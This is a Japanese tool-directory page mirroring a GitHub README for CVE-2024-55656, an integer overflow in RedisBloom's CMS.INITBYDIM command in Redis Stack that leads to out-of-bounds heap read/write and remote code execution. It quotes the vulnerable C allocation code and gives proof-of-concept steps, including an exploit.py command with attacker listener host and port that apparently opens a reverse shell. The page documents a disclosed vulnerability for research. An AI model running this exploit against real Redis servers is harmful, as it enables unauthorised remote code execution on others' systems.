Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
redis-stack-CVE-2024-55656 | Kitploit
ツール/GitHubGitHub/rick2600/redis-stack-cve-2024-55656
メモリフォレンジック脆弱性分析エクスプロイトペネトレーションテストデータベースセキュリティバイナリエクスプロイト
GitHubrick2600/redis-stack-cve-2024-55656

redis-stack-CVE-2024-55656

リポジトリを見る
1年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2024-55656 - Redis Stack - RedisBloom 整数オーバーフローによるリモートコード実行の脆弱性

  • タイトル: Redis Stack RedisBloom 整数オーバーフローによるリモートコード実行の脆弱性
  • ZDI: ZDI-25-009
  • CVE: CVE-2024-55656
  • クレジット: rick2600 と gqsilva
  • CVSS: 8.8 (HIGH)
  • 影響を受けるバージョン: Redis Stack 7.2.0-v10 に同梱されている RedisBloom v2.6.12

分析(簡易版)

redis(https://redis.io/docs/latest/develop/data-types/probabilistic/bloom-filter/)で使用されるモジュールである RedisBloom(https://github.com/RedisBloom/RedisBloom)には、整数オーバーフローの脆弱性があります。この整数オーバーフローの脆弱性により、攻撃者(パスワードを知っている redis クライアント)は、ラップアラウンドにより必要メモリよりも少ないヒープメモリを割り当てることができます。その後、割り当てられたメモリを超えて読み取りと書き込みが実行できるため、情報漏えいと OOB 書き込みが発生します。

整数オーバーフローは CMS.INITBYDIM コマンドに存在します。このコマンドは、ユーザーが指定した次元で Count-Min Sketch を初期化します。2つの値(width と depth)を受け取り、NewCMSketch() 内でメモリ割り当てに使用します。

ファイル: src/cms.c

root@kitploit:~
CMSketch *NewCMSketch(size_t width, size_t depth) {
    assert(width > 0);
    assert(depth > 0);

    CMSketch *cms = CMS_CALLOC(1, sizeof(CMSketch));

    cms->width = width;
    cms->depth = depth;
    cms->counter = 0;
    cms->array = CMS_CALLOC(width * depth, sizeof(uint32_t));

    return cms;
}

OOB 読み取りは、CMS_Query() に実装されている CMS.QUERY コマンドによって行われます。

OOB 書き込みは、CMS_IncrBy() に実装されている CMS.INCRBY コマンドによって行われます。

完全な分析については、アドバイザリ を確認してください。

概念実証

  1. redis-stack を起動します

docker run -p 6379:6379 --name redis-stack redis/redis-stack:7.2.0-v10

  1. エクスプロイトを実行します

python exploit.py --host 172.17.0.2 --port 6379 --lhost 172.17.0.1 --lport 4444

参考情報

  1. https://www.zerodayinitiative.com/advisories/ZDI-25-009/
  2. https://github.com/RedisBloom/RedisBloom/security/advisories/GHSA-x5rx-rmq3-ff3h
  3. https://redis.io/blog/security-advisory-cve-2024-46981-cve-2024-51737-cve-2024-51480-cve-2024-55656/
ツールをダウンロード